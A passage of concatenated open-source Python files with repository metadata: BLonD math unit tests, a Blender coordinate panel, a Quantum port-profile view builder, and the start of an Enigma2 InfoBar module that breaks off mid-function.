freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_py_1(self):
n_resonators = 20
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py1 = np.zeros(len(freq_a), complex)
impedance_py2 = np.zeros(len(freq_a), complex)
for res in range(0, n_resonators):
Qsquare = Q[res] * Q[res]
for freq in range(1, len(freq_a)):
commonTerm = (freq_a[freq] / freq_R[res]
- freq_R[res]/freq_a[freq])
impedance_py1.real[freq] += R_S[res] \
/ (1. + Qsquare * commonTerm * commonTerm)
impedance_py1.imag[freq] -= R_S[res] * (Q[res] * commonTerm) \
/ (1. + Qsquare * commonTerm * commonTerm)
for i in range(n_resonators):
impedance_py2[1:] += R_S[i] / (1 + 1j * Q[i]
* (freq_a[1:] / freq_R[i]
- freq_R[i] / freq_a[1:]))
np.testing.assert_almost_equal(
impedance_py1, impedance_py2, decimal=decimal)
class TestWhere(unittest.TestCase):
# Run before every test
def setUp(self):
np.random.seed(0)
pass
# Run after every test
def tearDown(self):
pass
def test_where_1(self):
a = np.random.randn(100)
less_than = np.random.rand()
real = np.where(a < less_than)[0]
testing = np.nonzero(bm.where(a, less_than=less_than))[0]
np.testing.assert_equal(real, testing)
def test_where_2(self):
a = np.random.randn(100)
more_than = np.random.rand()
real = np.where(a > more_than)[0]
testing = np.nonzero(bm.where(a, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_3(self):
a = np.random.randn(100)
less_than = np.random.rand()
more_than = np.random.rand()
real = np.where(np.logical_and(a < less_than, a > more_than))[0]
testing = np.nonzero(bm.where(a, less_than=less_than, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_4(self):
a = np.random.randn(100)
less_than = np.random.rand()
more_than = less_than
real = np.where(np.logical_and(a < less_than, a > more_than))[0]
testing = np.nonzero(bm.where(a, less_than=less_than, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_5(self):
a = np.random.randn(100)
less_than = 0
more_than = 1
real = np.where(np.logical_and(a < less_than, a > more_than))[0]
testing = np.nonzero(bm.where(a, less_than=less_than, more_than=more_than))[0]
np.testing.assert_equal(real, testing)
def test_where_6(self):
a = np.arange(100).reshape(10,10)
testing = bm.where(a, less_than=0)
np.testing.assert_equal(a.shape, testing.shape, err_msg='Shapes do not match.')
def test_where_7(self):
a = np.arange(9, dtype=np.float).reshape(3,3)
threshold = 4
real = a < threshold
testing = bm.where(a, less_than=threshold)
np.testing.assert_equal(real, testing)
class TestSin(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_sin_scalar_1(self):
a = np.random.rand()
np.testing.assert_almost_equal(bm.sin(a), np.sin(a), decimal=8)
def test_sin_scalar_2(self):
np.testing.assert_almost_equal(
bm.sin(-np.pi), np.sin(-np.pi), decimal=8)
def test_sin_vector_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.sin(a), np.sin(a), decimal=8)
class TestCos(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_cos_scalar_1(self):
a = np.random.rand()
np.testing.assert_almost_equal(bm.cos(a), np.cos(a), decimal=8)
def test_cos_scalar_2(self):
np.testing.assert_almost_equal(
bm.cos(-2*np.pi), np.cos(-2*np.pi), decimal=8)
def test_cos_vector_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.cos(a), np.cos(a), decimal=8)
class TestExp(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_exp_scalar_1(self):
a = np.random.rand()
np.testing.assert_almost_equal(bm.exp(a), np.exp(a), decimal=8)
def test_exp_vector_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.exp(a), np.exp(a), decimal=8)
class TestMean(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_mean_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.mean(a), np.mean(a), decimal=8)
def test_mean_2(self):
a = np.random.randn(1)
np.testing.assert_almost_equal(bm.mean(a), np.mean(a), decimal=8)
class TestStd(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_std_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.std(a), np.std(a), decimal=8)
def test_std_2(self):
a = np.random.randn(1)
np.testing.assert_almost_equal(bm.std(a), np.std(a), decimal=8)
class TestSum(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_sum_1(self):
a = np.random.randn(100)
np.testing.assert_almost_equal(bm.sum(a), np.sum(a), decimal=8)
def test_sum_2(self):
a = np.random.randn(1)
np.testing.assert_almost_equal(bm.sum(a), np.sum(a), decimal=8)
class TestLinspace(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_linspace_1(self):
start = 0.
stop = 10.
num = 33
np.testing.assert_almost_equal(bm.linspace(start, stop, num),
np.linspace(start, stop, num), decimal=8)
def test_linspace_2(self):
start = 0
stop = 10
num = 33
np.testing.assert_almost_equal(bm.linspace(start, stop, num),
np.linspace(start, stop, num), decimal=8)
def test_linspace_3(self):
start = 12.234
stop = -10.456
np.testing.assert_almost_equal(bm.linspace(start, stop),
np.linspace(start, stop), decimal=8)
def test_linspace_4(self):
start = np.random.rand()
stop = np.random.rand()
num = int(np.random.rand())
np.testing.assert_almost_equal(bm.linspace(start, stop, num),
np.linspace(start, stop, num), decimal=8)
class TestArange(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_arange_1(self):
start = 0.
stop = 1000.
step = 33
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
def test_arange_2(self):
start = 0
stop = 1000
step = 33
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
def test_arange_3(self):
start = 12.234
stop = -10.456
step = -0.067
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
def test_arange_4(self):
start = np.random.rand()
stop = np.random.rand()
start, stop = min(start, stop), max(start, stop)
step = np.random.random() * (stop - start) / 60.
np.testing.assert_almost_equal(bm.arange(start, stop, step),
np.arange(start, stop, step), decimal=8)
class TestArgMin(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_min_idx_1(self):
a = np.random.randn(100)
np.testing.assert_equal(bm.argmin(a), np.argmin(a))
def test_min_idx_2(self):
a = np.random.randn(1000)
np.testing.assert_equal(bm.argmin(a), np.argmin(a))
class TestArgMax(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_max_idx_1(self):
a = np.random.randn(100)
np.testing.assert_equal(bm.argmax(a), np.argmax(a))
def test_max_idx_2(self):
a = np.random.randn(1000)
np.testing.assert_equal(bm.argmax(a), np.argmax(a))
class TestConvolve(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_convolve_1(self):
s = np.random.randn(100)
k = np.random.randn(100)
np.testing.assert_almost_equal(bm.convolve(s, k, mode='full'),
np.convolve(s, k, mode='full'),
decimal=8)
def test_convolve_2(self):
s = np.random.randn(200)
k = np.random.randn(200)
with self.assertRaises(RuntimeError):
bm.convolve(s, k, mode='same', )
with self.assertRaises(RuntimeError):
bm.convolve(s, k, mode='valid')
class TestInterp(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_interp_1(self):
x = np.random.randn(100)
xp = np.random.randn(100)
xp.sort()
yp = np.random.randn(100)
np.testing.assert_almost_equal(bm.interp(x, xp, yp),
np.interp(x, xp, yp), decimal=8)
def test_interp_2(self):
x = np.random.randn(200)
x.sort()
xp = np.random.randn(50)
xp.sort()
yp = np.random.randn(50)
np.testing.assert_almost_equal(bm.interp(x, xp, yp),
np.interp(x, xp, yp), decimal=8)
def test_interp_3(self):
x = np.random.randn(1)
xp = np.random.randn(50)
xp.sort()
yp = np.random.randn(50)
np.testing.assert_almost_equal(bm.interp(x, xp, yp),
np.interp(x, xp, yp), decimal=8)
def test_interp_4(self):
x = np.random.randn(1)
xp = np.random.randn(50)
xp.sort()
yp = np.random.randn(50)
np.testing.assert_almost_equal(bm.interp(x, xp, yp, 0., 1.),
np.interp(x, xp, yp, 0., 1.), decimal=8)
class TestTrapz(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_trapz_1(self):
y = np.random.randn(100)
np.testing.assert_almost_equal(bm.trapz(y), np.trapz(y), decimal=8)
def test_trapz_2(self):
y = np.random.randn(100)
x = np.random.rand(100)
np.testing.assert_almost_equal(bm.trapz(y, x=x),
np.trapz(y, x=x), decimal=8)
def test_trapz_3(self):
y = np.random.randn(100)
np.testing.assert_almost_equal(bm.trapz(y, dx=0.1),
np.trapz(y, dx=0.1), decimal=8)
class TestCumTrapz(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_cumtrapz_1(self):
import scipy.integrate
y = np.random.randn(100)
initial = np.random.rand()
np.testing.assert_almost_equal(bm.cumtrapz(y, initial=initial),
scipy.integrate.cumtrapz(
y, initial=initial),
decimal=8)
def test_cumtrapz_2(self):
import scipy.integrate
y = np.random.randn(100)
np.testing.assert_almost_equal(bm.cumtrapz(y),
scipy.integrate.cumtrapz(y),
decimal=8)
def test_cumtrapz_3(self):
import scipy.integrate
y = np.random.randn(100)
dx = np.random.rand()
np.testing.assert_almost_equal(bm.cumtrapz(y, dx=dx),
scipy.integrate.cumtrapz(y, dx=dx),
decimal=8)
def test_cumtrapz_4(self):
import scipy.integrate
y = np.random.randn(100)
dx = np.random.rand()
initial = np.random.rand()
np.testing.assert_almost_equal(bm.cumtrapz(y, initial=initial, dx=dx),
scipy.integrate.cumtrapz(
y, initial=initial, dx=dx),
decimal=8)
class TestSort(unittest.TestCase):
# Run before every test
def setUp(self):
pass
# Run after every test
def tearDown(self):
pass
def test_sort_1(self):
y = np.random.randn(100)
y2 = np.copy(y)
y2.sort()
np.testing.assert_equal(bm.sort(y), y2)
def test_sort_2(self):
y = np.random.randn(200)
y2 = np.copy(y)
np.testing.assert_equal(bm.sort(y, reverse=True),
sorted(y2, reverse=True))
def test_sort_3(self):
y = np.random.randn(200)
y2 = np.copy(y)
bm.sort(y)
y2.sort()
np.testing.assert_equal(y, y2)
bm.sort(y, reverse=True)
y2 = sorted(y2, reverse=True)
np.testing.assert_equal(y, y2)
def test_sort_4(self):
y = np.array([np.random.randint(100)
for i in range(100)], dtype=np.int32)
y2 = np.copy(y)
bm.sort(y)
y2.sort()
np.testing.assert_equal(y, y2)
bm.sort(y, reverse=True)
y2 = sorted(y2, reverse=True)
np.testing.assert_equal(y, y2)
def test_sort_5(self):
y = np.array([np.random.randint(100)
for i in range(100)], dtype=int)
y2 = np.copy(y)
bm.sort(y)
y2.sort()
np.testing.assert_equal(y, y2)
bm.sort(y, reverse=True)
y2 = sorted(y2, reverse=True)
np.testing.assert_equal(y, y2)
if __name__ == '__main__':
unittest.main()
| blond-admin/BLonD | unittests/utils/test_blondmath.py | Python | gpl-3.0 | 20,919 |
import bpy
import mathutils
sphere = bpy.data.objects["Sphere"]
loc = (sphere.location.x, sphere.location.y, sphere.location.z)
class SphereTrackCoordinates(bpy.types.Panel):
"""A Custom Panel in the Viewport Toolbar"""
bl_label = "SphereTrackCoordinates"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
def draw(self, context):
layout = self.layout
row = layout.row()
row.label(text="Sphere Coordinates")
row = layout.row()
row.label(text="X-Coordinate")
row = layout.row()
row.label(str(loc[0]))
row = layout.row()
row.label(text="Y-Coordinate")
row = layout.row()
row.label(str(loc[1]))
row = layout.row()
row.label(text="Z-Coordinate")
row = layout.row()
row.label(str(loc[2]))
split = layout.split()
col = split.column(align=True)
#col.operator("mesh.primitive_plane_add", text="Plane", icon='MESH_PLANE')
#col.operator("mesh.primitive_torus_add", text="Torus", icon='MESH_TORUS')
def register():
bpy.utils.register_class(SphereTrackCoordinates)
def unregister():
bpy.utils.unregister_class(SphereTrackCoordinates)
if __name__ == "__main__":
register() | james-massey/AdvancedReality | Blender Plugin/CoordinateTrack.py | Python | apache-2.0 | 1,302 |
"""
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2011 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Ying Liu, Cisco Systems, Inc.
#
"""
def get_view_builder(req):
"""get view builder"""
base_url = req.application_url
return ViewBuilder(base_url)
class ViewBuilder(object):
"""
ViewBuilder for Portprofile,
derived from quantum.views.networks
"""
def __init__(self, base_url):
"""
:param base_url: url of the root wsgi application
"""
self.base_url = base_url
def build(self, portprofile_data, is_detail=False):
"""Generic method used to generate a portprofile entity."""
if is_detail:
portprofile = self._build_detail(portprofile_data)
else:
portprofile = self._build_simple(portprofile_data)
return portprofile
def _build_simple(self, portprofile_data):
"""Return a simple description of a portprofile"""
return dict(portprofile=dict(id=portprofile_data['profile_id']))
def _build_detail(self, portprofile_data):
"""Return a detailed info of a portprofile."""
if (portprofile_data['assignment'] is None):
return dict(portprofile=dict(id=portprofile_data['profile_id'],
name=portprofile_data['profile_name'],
qos_name=portprofile_data['qos_name']))
else:
return dict(portprofile=dict(id=portprofile_data['profile_id'],
name=portprofile_data['profile_name'],
qos_name=portprofile_data['qos_name'],
assignment=portprofile_data['assignment']))
| rcbops/quantum-buildpackage | quantum/extensions/_pprofiles.py | Python | apache-2.0 | 2,300 |
# -*- coding: utf-8 -*-
from Components.ActionMap import ActionMap, HelpableActionMap, NumberActionMap
from Components.Harddisk import harddiskmanager, findMountPoint
from Components.Input import Input
from Components.Label import Label
from Components.MovieList import AUDIO_EXTENSIONS, MOVIE_EXTENSIONS, DVD_EXTENSIONS
from Components.PluginComponent import plugins
from Components.ServiceEventTracker import ServiceEventTracker
from Components.Sources.ServiceEvent import ServiceEvent
from Components.Sources.Boolean import Boolean
from Components.Sources.List import List
from Components.config import config, configfile, ConfigBoolean, ConfigClock
from Components.SystemInfo import SystemInfo
from Components.UsageConfig import preferredInstantRecordPath, defaultMoviePath, preferredTimerPath, ConfigSelection
from Components.VolumeControl import VolumeControl
from Components.Pixmap import MovingPixmap, MultiPixmap
from Components.Sources.StaticText import StaticText
from Components.ScrollLabel import ScrollLabel
from Plugins.Plugin import PluginDescriptor
from Components.Timeshift import InfoBarTimeshift
from Screens.Screen import Screen
from Screens import ScreenSaver
from Screens.ChannelSelection import ChannelSelection, PiPZapSelection, BouquetSelector, SilentBouquetSelector, EpgBouquetSelector, service_types_tv
from Screens.ChoiceBox import ChoiceBox
from Screens.Dish import Dish
from Screens.EventView import EventViewEPGSelect, EventViewSimple
from Screens.EpgSelection import EPGSelection
from Screens.InputBox import InputBox
from Screens.MessageBox import MessageBox
from Screens.MinuteInput import MinuteInput
from Screens.TimerSelection import TimerSelection
from Screens.PictureInPicture import PictureInPicture
from Screens.PVRState import PVRState, TimeshiftState
from Screens.SubtitleDisplay import SubtitleDisplay
from Screens.RdsDisplay import RdsInfoDisplay, RassInteractive
from Screens.Standby import Standby, TryQuitMainloop
from Screens.TimeDateInput import TimeDateInput
from Screens.TimerEdit import TimerEditList
from Screens.UnhandledKey import UnhandledKey
from ServiceReference import ServiceReference, isPlayableForCur
from RecordTimer import RecordTimer, RecordTimerEntry, parseEvent, AFTEREVENT, findSafeRecordPath
from Screens.TimerEntry import TimerEntry as TimerEntry
from Tools.Directories import SCOPE_VOD
from Tools import Directories, Notifications
from Tools.Directories import pathExists, fileExists, getRecordingFilename, copyfile, moveFiles, resolveFilename, SCOPE_TIMESHIFT, SCOPE_CURRENT_SKIN
from Tools.KeyBindings import getKeyDescription
from enigma import eTimer, eServiceCenter, eDVBServicePMTHandler, iServiceInformation, iPlayableService, eServiceReference, eEPGCache, eActionMap, eDVBVolumecontrol, getDesktop, quitMainloop, eDVBDB
from boxbranding import getBoxType, getMachineProcModel, getMachineBuild, getMachineBrand, getMachineName
from time import time, localtime, strftime
from bisect import insort
from sys import maxint
from keyids import KEYIDS
from datetime import datetime
import os, cPickle
# hack alert!
from Screens.Menu import MainMenu, Menu, mdom
from Screens.Setup import Setup
import Screens.Standby
AUDIO = False
seek_withjumps_muted = False
jump_pts_adder = 0
jump_last_pts = None
jump_last_pos = None
if fileExists("/usr/lib/enigma2/python/Plugins/Extensions/CoolTVGuide/plugin.pyo"):
COOLTVGUIDE = True
else:
COOLTVGUIDE = False
def isStandardInfoBar(self):
return self.__class__.__name__ == "InfoBar"
def isMoviePlayerInfoBar(self):
return self.__class__.__name__ == "MoviePlayer"
def setResumePoint(session):
global resumePointCache, resumePointCacheLast
service = session.nav.getCurrentService()
ref = session.nav.getCurrentlyPlayingServiceOrGroup()
if (service is not None) and (ref is not None): # and (ref.type != 1):
# ref type 1 has its own memory...
seek = service.seek()
if seek:
pos = seek.getPlayPosition()
if not pos[0]:
key = ref.toString()
lru = int(time())
l = seek.getLength()
if l:
l = l[1]
else:
l = None
resumePointCache[key] = [lru, pos[1], l]
for k, v in resumePointCache.items():
if v[0] < lru:
candidate = k
filepath = os.path.realpath(candidate.split(':')[-1])
mountpoint = findMountPoint(filepath)
if os.path.ismount(mountpoint) and not os.path.exists(filepath):
del resumePointCache[candidate]
saveResumePoints()
def delResumePoint(ref):
global resumePointCache, resumePointCacheLast
try:
del resumePointCache[ref.toString()]
except KeyError:
pass
saveResumePoints()
def getResumePoint(session):
global resumePointCache
ref = session.nav.getCurrentlyPlayingServiceOrGroup()
if (ref is not None) and (ref.type != 1):
try:
entry = resumePointCache[ref.toString()]
entry[0] = int(time()) # update LRU timestamp
return entry[1]
except KeyError:
return None
def saveResumePoints():
global resumePointCache, resumePointCacheLast
try:
f = open('/etc/enigma2/resumepoints.pkl', 'wb')
cPickle.dump(resumePointCache, f, cPickle.HIGHEST_PROTOCOL)
f.close()
except Exception, ex:
print "[InfoBar] Failed to write resumepoints:", ex
resumePointCacheLast = int(time())
def loadResumePoints():
try:
file = open('/etc/enigma2/resumepoints.pkl', 'rb')
PickleFile = cPickle.load(file)
file.close()
return PickleFile
except Exception, ex:
print "[InfoBar] Failed to load resumepoints:", ex
return {}
def updateresumePointCache():
global resumePointCache
resumePointCache = loadResumePoints()
def ToggleVideo():
mode = open("/proc/stb/video/policy").read()[:-1]
print mode
if mode == "letterbox":
f = open("/proc/stb/video/policy", "w")
f.write("panscan")
f.close()
elif mode == "panscan":
f = open("/proc/stb/video/policy", "w")
f.write("letterbox")
f.close()
else:
# if current policy is not panscan or letterbox, set to panscan
f = open("/proc/stb/video/policy", "w")
f.write("panscan")
f.close()
resumePointCache = loadResumePoints()
resumePointCacheLast = int(time())
class InfoBarDish:
def __init__(self):
self.dishDialog = self.session.instantiateDialog(Dish)
self.dishDialog.setAnimationMode(0)
class InfoBarLongKeyDetection:
def __init__(self):
eActionMap.getInstance().bindAction('', -maxint -1, self.detection) #highest prio
self.LongButtonPressed = False
#this function is called on every keypress!
def detection(self, key, flag):
if flag == 3:
self.LongButtonPressed = True
elif flag == 0:
self.LongButtonPressed = False
class InfoBarUnhandledKey:
def __init__(self):
self.unhandledKeyDialog = self.session.instantiateDialog(UnhandledKey)
self.unhandledKeyDialog.setAnimationMode(0)
self.hideUnhandledKeySymbolTimer = eTimer()
self.hideUnhandledKeySymbolTimer.callback.append(self.unhandledKeyDialog.hide)
self.checkUnusedTimer = eTimer()
self.checkUnusedTimer.callback.append(self.checkUnused)
self.onLayoutFinish.append(self.unhandledKeyDialog.hide)
eActionMap.getInstance().bindAction('', -maxint -1, self.actionA) #highest prio
eActionMap.getInstance().bindAction('', maxint, self.actionB) #lowest prio
self.flags = (1<<1)
self.uflags = 0
#this function is called on every keypress!
def actionA(self, key, flag):
try:
print 'KEY: %s %s %s %s' % (key,flag,(key_name for key_name,value in KEYIDS.items() if value==key).next(),getKeyDescription(key)[0])
except:
try:
print 'KEY: %s %s %s' % (key,flag,(key_name for key_name,value in KEYIDS.items() if value==key).next()) # inverse dictionary lookup in KEYIDS
except:
print 'KEY: %s %s' % (key,flag)
self.unhandledKeyDialog.hide()
if self.closeSIB(key) and self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
if flag != 4:
if self.flags & (1<<1):
self.flags = self.uflags = 0
self.flags |= (1<<flag)
if flag == 1: # break
self.checkUnusedTimer.start(0, True)
return 0
def closeSIB(self, key):
if key >= 12 and key not in (114, 115, 352, 103, 108, 402, 403, 407, 412, 352, 358):
return True
else:
return False
#this function is only called when no other action has handled this key
def actionB(self, key, flag):
if flag != 4:
self.uflags |= (1<<flag)
def checkUnused(self):
if self.flags == self.uflags:
self.unhandledKeyDialog.show()
self.hideUnhandledKeySymbolTimer.start(2000, True)
class InfoBarScreenSaver:
def __init__(self):
self.onExecBegin.append(self.__onExecBegin)
self.onExecEnd.append(self.__onExecEnd)
self.screenSaverTimer = eTimer()
self.screenSaverTimer.callback.append(self.screensaverTimeout)
self.screensaver = self.session.instantiateDialog(ScreenSaver.Screensaver)
self.onLayoutFinish.append(self.__layoutFinished)
def __layoutFinished(self):
self.screensaver.hide()
def __onExecBegin(self):
self.ScreenSaverTimerStart()
def __onExecEnd(self):
if self.screensaver.shown:
self.screensaver.hide()
eActionMap.getInstance().unbindAction('', self.keypressScreenSaver)
self.screenSaverTimer.stop()
def ScreenSaverTimerStart(self):
time = int(config.usage.screen_saver.value)
flag = self.seekstate[0]
if not flag:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref and not (hasattr(self.session, "pipshown") and self.session.pipshown):
ref = ref.toString().split(":")
flag = ref[2] == "2" or os.path.splitext(ref[10])[1].lower() in AUDIO_EXTENSIONS
if time and flag:
self.screenSaverTimer.startLongTimer(time)
else:
self.screenSaverTimer.stop()
def screensaverTimeout(self):
if self.execing and not Screens.Standby.inStandby and not Screens.Standby.inTryQuitMainloop:
self.hide()
if hasattr(self, "pvrStateDialog"):
try:
self.pvrStateDialog.hide()
except:
pass
self.screensaver.show()
eActionMap.getInstance().bindAction('', -maxint - 1, self.keypressScreenSaver)
def keypressScreenSaver(self, key, flag):
if flag:
self.screensaver.hide()
self.show()
self.ScreenSaverTimerStart()
eActionMap.getInstance().unbindAction('', self.keypressScreenSaver)
class HideVBILine(Screen):
skin = """<screen position="0,0" size="%s,%s" backgroundColor="#000000" flags="wfNoBorder"/>""" % (getDesktop(0).size().width() * 2/3, getDesktop(0).size().height() / 360)
def __init__(self, session):
Screen.__init__(self, session)
class SecondInfoBar(Screen):
ADD_TIMER = 0
REMOVE_TIMER = 1
def __init__(self, session):
Screen.__init__(self, session)
if config.usage.show_second_infobar.value == "3" and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('OPD-Blue-Line/skin.xml')):
self.skinName = "SecondInfoBar/OPD-Blue-Line/skin.xml"
else:
self.skinName = "SecondInfoBar"
self["epg_description"] = ScrollLabel()
self["FullDescription"] = ScrollLabel()
self["channel"] = Label()
self["key_red"] = Label()
self["key_green"] = Label()
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["SecondInfoBar"] = ActionMap(["2ndInfobarActions"],
{
"pageUp": self.pageUp,
"pageDown": self.pageDown,
"prevPage": self.pageUp,
"nextPage": self.pageDown,
"prevEvent": self.prevEvent,
"nextEvent": self.nextEvent,
"timerAdd": self.timerAdd,
"openSimilarList": self.openSimilarList,
}, -1)
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evUpdatedEventInfo: self.getEvent
})
self.onShow.append(self.__Show)
self.onHide.append(self.__Hide)
def pageUp(self):
self["epg_description"].pageUp()
self["FullDescription"].pageUp()
def pageDown(self):
self["epg_description"].pageDown()
self["FullDescription"].pageDown()
def __Show(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
self["key_red"].setText(_("EPG"))
self["key_blue"].setText(_("Blue Panel"))
self["SecondInfoBar"].doBind()
self.getEvent()
def __Hide(self):
if self["SecondInfoBar"].bound:
self["SecondInfoBar"].doUnbind()
def getEvent(self):
self["epg_description"].setText("")
self["FullDescription"].setText("")
self["channel"].setText("")
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
Event = self.epglist[0]
Ref = ServiceReference(ref)
callback = self.eventViewCallback
self.cbFunc = callback
self.currentService = Ref
self.isRecording = (not Ref.ref.flags & eServiceReference.isGroup) and Ref.ref.getPath()
self.event = Event
self.key_green_choice = self.ADD_TIMER
if self.isRecording:
self["key_green"].setText("")
else:
self["key_green"].setText(_("Add timer"))
self.setEvent(self.event)
def getNowNext(self):
epglist = [ ]
service = self.session.nav.getCurrentService()
info = service and service.info()
ptr = info and info.getEvent(0)
if ptr:
epglist.append(ptr)
ptr = info and info.getEvent(1)
if ptr:
epglist.append(ptr)
self.epglist = epglist
def eventViewCallback(self, setEvent, setService, val): #used for now/next displaying
epglist = self.epglist
if len(epglist) > 1:
tmp = epglist[0]
epglist[0] = epglist[1]
epglist[1] = tmp
setEvent(epglist[0])
def prevEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, -1)
def nextEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, +1)
def removeTimer(self, timer):
timer.afterEvent = AFTEREVENT.NONE
self.session.nav.RecordTimer.removeEntry(timer)
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
def timerAdd(self):
self.hide()
self.secondInfoBarWasShown = False
if self.isRecording:
return
event = self.event
serviceref = self.currentService
if event is None:
return
eventid = event.getEventId()
refstr = serviceref.ref.toString()
for timer in self.session.nav.RecordTimer.timer_list:
if timer.eit == eventid and timer.service_ref.ref.toString() == refstr:
cb_func = lambda ret : not ret or self.removeTimer(timer)
self.session.openWithCallback(cb_func, MessageBox, _("Do you really want to delete %s?") % event.getEventName())
break
else:
newEntry = RecordTimerEntry(self.currentService, afterEvent = AFTEREVENT.AUTO, justplay = False, always_zap = False, checkOldTimers = True, dirname = preferredTimerPath(), *parseEvent(self.event))
self.session.openWithCallback(self.finishedAdd, TimerEntry, newEntry)
def finishedAdd(self, answer):
# print "finished add"
if answer[0]:
entry = answer[1]
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
for x in simulTimerList:
if x.setAutoincreaseEnd(entry):
self.session.nav.RecordTimer.timeChanged(x)
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
if not entry.repeated and not config.recording.margin_before.value and not config.recording.margin_after.value and len(simulTimerList) > 1:
change_time = False
conflict_begin = simulTimerList[1].begin
conflict_end = simulTimerList[1].end
if conflict_begin == entry.end:
entry.end -= 30
change_time = True
elif entry.begin == conflict_end:
entry.begin += 30
change_time = True
if change_time:
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
self.session.openWithCallback(self.finishSanityCorrection, TimerSanityConflict, simulTimerList)
self["key_green"].setText(_("Remove timer"))
self.key_green_choice = self.REMOVE_TIMER
else:
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
# print "Timeredit aborted"
def finishSanityCorrection(self, answer):
self.finishedAdd(answer)
def setService(self, service):
self.currentService=service
if self.isRecording:
self["channel"].setText(_("Recording"))
else:
name = self.currentService.getServiceName()
if name is not None:
self["channel"].setText(name)
else:
self["channel"].setText(_("unknown service"))
def sort_func(self,x,y):
if x[1] < y[1]:
return -1
elif x[1] == y[1]:
return 0
else:
return 1
def setEvent(self, event):
if event is None:
return
self.event = event
try:
name = event.getEventName()
self["channel"].setText(name)
except:
pass
description = event.getShortDescription()
extended = event.getExtendedDescription()
if description and extended:
description += '\n'
text = description + extended
self.setTitle(event.getEventName())
self["epg_description"].setText(text)
serviceref = self.currentService
eventid = self.event.getEventId()
refstr = serviceref.ref.toString()
isRecordEvent = False
for timer in self.session.nav.RecordTimer.timer_list:
if timer.eit == eventid and timer.service_ref.ref.toString() == refstr:
isRecordEvent = True
break
if isRecordEvent and self.key_green_choice != self.REMOVE_TIMER:
self["key_green"].setText(_("Remove timer"))
self.key_green_choice = self.REMOVE_TIMER
elif not isRecordEvent and self.key_green_choice != self.ADD_TIMER:
self["key_green"].setText(_("Add timer"))
